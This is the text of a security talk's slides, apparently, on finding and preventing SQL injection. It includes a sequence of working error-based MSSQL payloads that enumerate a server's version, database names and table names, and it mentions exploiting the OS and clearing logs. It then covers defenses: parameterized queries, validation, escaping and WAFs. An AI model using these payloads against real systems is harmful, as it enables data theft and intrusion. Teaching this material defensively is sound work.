How to Identify and Prevent SQL Injection
#Whoami
Janith Malinga
Security Consultant @egscyber
Web Pentester for 4 years
Enthusiastic traveler
Community teacher for over 6 years
Twitter : @janithSmalinga
linkedIn : https://www.linkedin.com/in/malingajanith/
Github : https://github.com/janithmalinga
Phone : 0769803462
Why web applications need security
• Behind most applications lies sensitive data
• Easy to access
• Anybody can access from anywhere
• Hard to trace back
• Lots of tools are available to attack a web site (sqlmap, BeEF)
Web Application Vulnerabilities
OWASP Top 10 Application Security Risks
1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components with Known Vulnerabilities
10. Insufficient Logging & Monitoring
SQL Injection (SQLi)
What is SQLi
SQLi is a vulnerability that lets an attacker influence the SQL queries an application passes to its backend database.
Well known SQLi Attacks
• Lenovo (2019)
1+ million users compromised
• Texas.gov and Florida.gov (2018)
State databases of contractors and employees were leaked.
• Shamshabad engineering college incident (2018)
Students hacked the system and changed their results.
• Mossack Fonseca (Panama Papers) (2016)
The famous Panama Papers incident by WikiLeaks.
Well known SQLi Attacks
SQLi Malware
• Asprox
• Lizamoon
Understand how web applications work
Client Computer Application Server Database Server
Understand how web applications work
Client Computer Application Server Database Server
Request: /home.php
Response: /home.php
Understand how web applications work
Student search
ID: Search
https://www.abcd.com/student
Understand how web applications work
Student search
ID: 123  Search
https://www.abcd.com/student?id=123
Understand how web applications work
Student search
ID: 123  Search
https://www.abcd.com/student
ID 123
Name Bob
Age 18
Class Maths
Understand how web applications work
Client Computer  Application Server  Database Server
Request: /student.php?id=123
Response: /student.php
id=123&name=Bob&age=18&class=Maths
What’s happening under the hood???
Select * from students where id=123
123 Bob 18 Maths
Understanding SQLi
Recall: what is SQLi?
SQLi is a vulnerability that results when an application gives an attacker the ability
to influence the SQL queries that it passes to a backend database.
Understanding SQLi
Now let’s manipulate the input so that the database will be confused ☺
Understand how web applications work
Student search
ID: '  Search
https://www.abcd.com/student?id='
The user input is only the ' character
Understand how web applications work
Client Computer  Application Server  Database Server
Request: /student.php?id='
Response: /student.php
Error: What the heck are you searching???
What’s happening under the hood???
Select * from students where id='
Error: What the heck are you searching???
Understand how web applications work
Student search
ID: '  Search
https://www.abcd.com/student?id='
Error: What the heck are you searching???
MySQL error
MSSQL error
Understanding SQLi
DEMO
What SQLi can do
• Extract data
• Add or modify data
• Perform a DoS attack
• Bypass authentication
• Execute remote commands
Sample SQL Injection Attack
Web login form
First we send the ' character as input
Member login
Username:
Password:
Login
Output: the page is vulnerable to SQL injection
Payload: a' and 1=0/@@version;--
Find database version
Payload: a' and 1=0/(select @@servername);--
Find server name
Payload: a' and 1=0/(select db_name());--
Find database name
Payload: a' and 1=0/(select top 1 name from master..sysdatabases);--
Find all databases
Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 1 name from master..sysdatabases));--
Find all databases
Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 2 name from master..sysdatabases));--
Find all databases
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 1 name from sysobjects where xtype = 'U'));--
Find tables
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 2 name from sysobjects where xtype = 'U'));--
Find tables
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 3 name from sysobjects where xtype = 'U'));--
Find tables
Next steps
• Getting all the data
• Manipulating the data
• Finally exploit the OS and gain access to the server and clear the logs.
☺ ☺ ☺
How to Prevent SQL Injection
Prevent SQL Injection
1. Code level prevention
2. Platform level prevention
Prevent SQL Injection
Code level prevention - Use parameterized queries
Bad practice
username = request("username")
password = request("password")
sql = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'";
result = Db.Execute(sql)
if (result) { /* Login success */ }
Prevent SQL Injection
Good practice: Use parameterized queries
username = request("username")
password = request("password")
String sql = "SELECT * FROM users WHERE username=? AND password=?";
PreparedStatement cmd = con.prepareStatement(sql);
cmd.setString(1, username);
cmd.setString(2, password);
ResultSet result = cmd.executeQuery();
if (result.next()) { /* Login success */ }
Prevent SQL Injection
Code level prevention - Validating input
• Whitelisting
• Blacklisting
Check data type, data size, data range and content
Prevent SQL Injection
Code level prevention - Encoding output
Encoding to the database
sql = sql.replace("'", "''");
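An added example (not from the slides) that puts the three code-level controls side by side: the concatenated login query, the parameterized login query, and the quote-doubling "encoding" applied to the unquoted student search. It swaps the slides' JDBC-style pseudocode for Python with an in-memory SQLite database; the students/users tables, the user o'brien and the input 120+3 are constructed assumptions.

```python
"""Student search and login form from the slides, rebuilt on an in-memory SQLite
database with constructed sample data, to contrast the code-level controls."""
import sqlite3


def make_db():
    """Constructed data mirroring the slides: student (123, Bob, 18, Maths) and a
    users table. Passwords are plaintext only to match the slide's schema; a real
    application stores password hashes."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE students (id INTEGER, name TEXT, age INTEGER, class TEXT)")
    con.execute("INSERT INTO students VALUES (123, 'Bob', 18, 'Maths')")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "s3cret"), ("o'brien", "pw2")])  # assumed users
    con.commit()
    return con


def login_concat(con, username, password):
    """Bad practice from the slide: the query is built by string concatenation,
    so a quote in either field is parsed as SQL syntax, not as data."""
    sql = ("SELECT * FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    return con.execute(sql).fetchone() is not None


def login_param(con, username, password):
    """Good practice from the slide: '?' placeholders with the values bound
    separately. The driver never splices user input into the SQL text."""
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone() is not None


def student_escaped(con, student_id):
    """The slide's encoding control, sql.replace("'", "''"), applied to the numeric
    student search. Doubling quotes only protects a value that sits inside quotes;
    id=... is unquoted, so whatever arrives is still parsed as SQL."""
    escaped = student_id.replace("'", "''")
    return con.execute("SELECT * FROM students WHERE id=" + escaped).fetchall()


def student_validated(con, student_id):
    """Whitelist validation (data type, size and range, as the slide lists) plus a
    bound parameter: only a short run of ASCII digits is accepted, then cast to int."""
    if not (student_id.isascii() and student_id.isdigit() and len(student_id) <= 9):
        raise ValueError("id must be a positive integer")
    return con.execute("SELECT * FROM students WHERE id=?",
                       (int(student_id),)).fetchall()


def outcome(fn, con, *args):
    """Classify what the data layer did: 'db-error' is the slide's
    'What the heck are you searching???' case, 'rejected' means input validation
    stopped the request, otherwise the query result is returned."""
    try:
        return fn(con, *args)
    except sqlite3.Error:
        return "db-error"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    con = make_db()
    # The slide's probe (a lone ' character) and a legitimate name with an apostrophe:
    # concatenation errors on both, the parameterized query handles both as data.
    for user, pw in (("alice", "s3cret"), ("'", "s3cret"), ("o'brien", "pw2")):
        print(f"concat   {user!r:10} -> {outcome(login_concat, con, user, pw)}")
        print(f"param    {user!r:10} -> {outcome(login_param, con, user, pw)}")
    # '120+3' is not an attack string, yet the quote-escaped but unquoted query
    # evaluates it as arithmetic and returns student 123; validation rejects it.
    for sid in ("123", "120+3", "'"):
        print(f"escaped  {sid!r:10} -> {outcome(student_escaped, con, sid)}")
        print(f"validate {sid!r:10} -> {outcome(student_validated, con, sid)}")
```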
Prevent SQL Injection
Platform level prevention - Web application firewall (WAF)
Prevent SQL Injection
Platform level prevention - IPS
Prevent SQL Injection
Platform level prevention – Log collection and Monitoring
Q&A !!!